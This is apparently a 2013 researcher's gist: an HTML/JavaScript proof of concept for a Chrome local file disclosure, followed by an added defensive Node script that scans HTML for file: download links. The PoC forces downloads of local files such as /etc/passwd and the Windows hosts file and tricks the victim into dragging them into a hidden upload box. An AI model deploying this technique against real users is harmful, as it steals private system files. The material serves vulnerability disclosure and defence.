@matt-
Created May 30, 2013 05:47
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Google Chrome "Local File Disclosure" via HTML5 Link Download with DND Upload POC</title>
<style>
html, body {
height: 100%;
}
.wrapper {
min-height: 100%;
height: auto !important;
height: 100%;
margin: 0 auto -140px;
}
.footer, .push {
height: 4em;
}
body
{
font-family: "Segoe UI", Tahoma, Helvetica, freesans, sans-serif;
font-size: 80%;
margin: 10px;
color: #333;
background-color: #fff;
}
h1, h2
{
font-size: 1.5em;
font-weight: normal;
}
h2
{
font-size: 1.3em;
}
#filedrag
{
font-weight: bold;
text-align: center;
padding: 1em 0;
color: #555;
border: 2px dashed #555;
border-radius: 7px;
cursor: default;
width:80%;
margin:0px auto;
line-height: 100px;
}
#filedrag.hover
{
color: #f00;
border-color: #f00;
border-style: solid;
box-shadow: inset 0 3px 4px #888;
}
a{
color: #369;
}
pre
{
font-family: monospace;
font-size: 0.9em;
padding: 1px 2px;
margin: 0 0 1em auto;
border: 1px inset #666;
background-color: #eee;
}
</style>
<script>
var has_run = false;
// getElementById
function $id(id) {
return document.getElementById(id);
}
function send_file(n){
// Build an anchor to the target URL, give it an HTML5 "download" name and
// fire a synthetic click so the browser saves a copy of the file.
var dl_link = document.createElement('a');
document.body.appendChild(dl_link);
dl_link.setAttribute('href', n);
dl_link.setAttribute('download', 'file_'+new Date().getTime()+'.txt');
var evt = document.createEvent("MouseEvents");
evt.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
dl_link.dispatchEvent(evt);
}
function init(){
// step 1: start a download of a same-origin file (a file:/// link only works
// once the tab has opened a download; a file:/// target such as
// "file:///C:/boot.ini" is used in the next step)
send_file('file.txt');
var fileselect = $id("fileselect");
fileselect.addEventListener("change", function(e){
// fetch FileList object
var files = e.target.files || e.dataTransfer.files;
// process all File objects
for (var i = 0, f; f = files[i]; i++) {
var reader = new FileReader();
var n = f.name;
reader.onload = function(e) {
if(!has_run){
//$id('progress').innerHTML += '<br>Now Lets try a local file. ';
alert('Now Lets try a local file. ');
$id('progress').innerHTML = 'On to step 3. Drag the new file below into the box above.';
// we can get a directory listing and do really bad things...
//send_file("file:////Users/");
send_file("file:////etc/passwd");
send_file("file:///C:/boot.ini");
// no boot.ini on win7?
send_file("file:///C:/Windows/System32/drivers/etc/hosts");
has_run = true;
}
else{
$id('progress').innerHTML = "<p>Contents of: <strong>" + n + ": </strong>(the attack would then use ajax to upload the file)</p><pre>" +
e.target.result.replace(/</g, "&lt;").replace(/>/g, "&gt;") +
"</pre>";
}
}
reader.readAsText(f);
}
}, false);
}
</script>
</head>
<body onload="//init()">
<div class="wrapper" id="content">
<h1>Google Chrome "Local File Disclosure" via HTML5 Link Download with DND Upload POC</h1>
<p>This is a demonstration of a local file "download" via the HTML5 download attribute. A link is created using a file:/// URL, and the HTML5 "download" attribute is set to name the downloaded file. This lets the attacker effectively copy any file the user has access to into the downloads directory under a name of the attacker's choosing. In this example the victim is then tricked into dragging the file back into an HTML5 drop zone, which uploads the arbitrary file to the server.</p><p>Note: until the tab has opened a downloaded file, a file:/// URL will not work from a remote page. In this example we first get the user to download a data: URL; after that a local file works as expected.</p>
<h2>Instructions</h2>
<ol>
<li>A file should automatically download. If it does not, click <a href="file.txt" download="step1.txt">here</a>.</li>
<li>Drag that file into the box below. (Sometimes shift+drag is required to download the file.)</li>
<li>A second file should automatically download. If it does not, try clicking
<a href="file:///C:/boot.ini" download="step3.txt">Win XP,</a>
<a href="file:///C:/Windows/System32/drivers/etc/hosts" download="step3.txt">Win 7,</a>
<a href="file:////etc/hosts" download="step3.txt">OSX</a> or <a href="#" onclick="window.location.reload();">try to reload</a> the page.</li>
<li>Drag the second file into the box to show its contents.</li>
</ol>
<br/><br/>
<div style="width:80%; margin:0px auto;z-index:99999;" >
<input type="file" style="opacity:0; width:100%; height:130px;z-index:99999;" id="fileselect" name="fileselect[]" multiple="multiple" />
</div>
<div id="filedrag" style=" margin:-130px auto;z-index:-1;">
Drop file here!
</div>
<div id="progress" style="margin:140px"></div>
<div class="push"></div>
</div>
<div class="footer">
<img src="drag.png" />
<div style="float: right; padding-top: 100px;">POC by <a href="http://twitter.com/mattaustin">@Matt Austin</a> of <a href="http://m-austin.com">m-austin.com</a> and <a href="http://aspectsecurity.com">Aspect Security</a></div>
</div>
<script>
init();
</script>
</body>
</html>
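The explanation paragraph and the instruction list above describe the primitive this PoC relies on: an anchor carrying the HTML5 download attribute whose href is a file:/// URL. As an added defender-side example (not code from the gist or its author), the following Node script audits an HTML document for exactly that pattern, the kind of check a content reviewer or a page-scanning tool would run. The small attribute parser and the sample markup, modelled on the gist's instruction links plus two harmless links, are constructed for this example.

```javascript
// Added example, not part of the gist: audit static HTML for <a download>
// links whose href is a file: URL. Runs under Node with no DOM; the small
// attribute parser and the sample markup below are constructed for this example.

// Pull name/value pairs out of a single <a ...> start tag (constructed helper,
// not a spec-complete HTML parser; sufficient for well-formed anchors).
function parseAttributes(tag) {
  var attrs = {};
  var body = tag.replace(/^<a\b/i, '').replace(/\/?>$/, '');
  var re = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;
  var m;
  while ((m = re.exec(body)) !== null) {
    var value = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : (m[4] !== undefined ? m[4] : ''));
    attrs[m[1].toLowerCase()] = value;
  }
  return attrs;
}

// Scan html for anchors that carry a download attribute and classify the href.
// pageUrl is the URL the document is served from; relative hrefs resolve against it.
function auditDownloadLinks(html, pageUrl) {
  var findings = [];
  var pageOrigin = new URL(pageUrl).origin;
  var tagRe = /<a\b[^>]*>/gi;
  var m;
  while ((m = tagRe.exec(html)) !== null) {
    var attrs = parseAttributes(m[0]);
    if (!('download' in attrs) || !('href' in attrs)) continue;
    var url;
    try {
      url = new URL(attrs.href, pageUrl);
    } catch (e) {
      findings.push({ href: attrs.href, download: attrs.download, reason: 'unparseable href' });
      continue;
    }
    if (url.protocol === 'file:') {
      // The case in the PoC: a remote page naming a local file as a download target.
      // Both file:///C:/... and the file:////etc/... form parse to the file: scheme.
      findings.push({ href: attrs.href, download: attrs.download, reason: 'file: scheme' });
    } else if (url.origin !== pageOrigin && url.protocol !== 'blob:' && url.protocol !== 'data:') {
      // Informational: a download name applied to a cross-origin resource.
      findings.push({ href: attrs.href, download: attrs.download, reason: 'cross-origin' });
    }
  }
  return findings;
}

// Constructed sample markup, modelled on the gist's instruction links plus two benign anchors.
var SAMPLE_PAGE = [
  '<a href="file.txt" download="step1.txt">here</a>',
  '<a href="file:///C:/boot.ini" download="step3.txt">Win XP,</a>',
  '<a href="file:///C:/Windows/System32/drivers/etc/hosts" download="step3.txt">Win 7,</a>',
  '<a href="file:////etc/hosts" download="step3.txt">OSX</a>',
  '<a href="#" onclick="window.location.reload();">try to reload</a>',
  '<a href="https://cdn.example/report.pdf" download>report</a>'
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  // Hypothetical serving origin for the sample; three file: findings and one cross-origin finding.
  console.log(JSON.stringify(auditDownloadLinks(SAMPLE_PAGE, 'https://attacker.example/'), null, 2));
}
```

A static scan like this only catches anchors present in the markup; the gist's `send_file` builds its anchor at runtime with `document.createElement('a')`, so the same scheme check has to be enforced where the download is actually initiated, which is the browser itself.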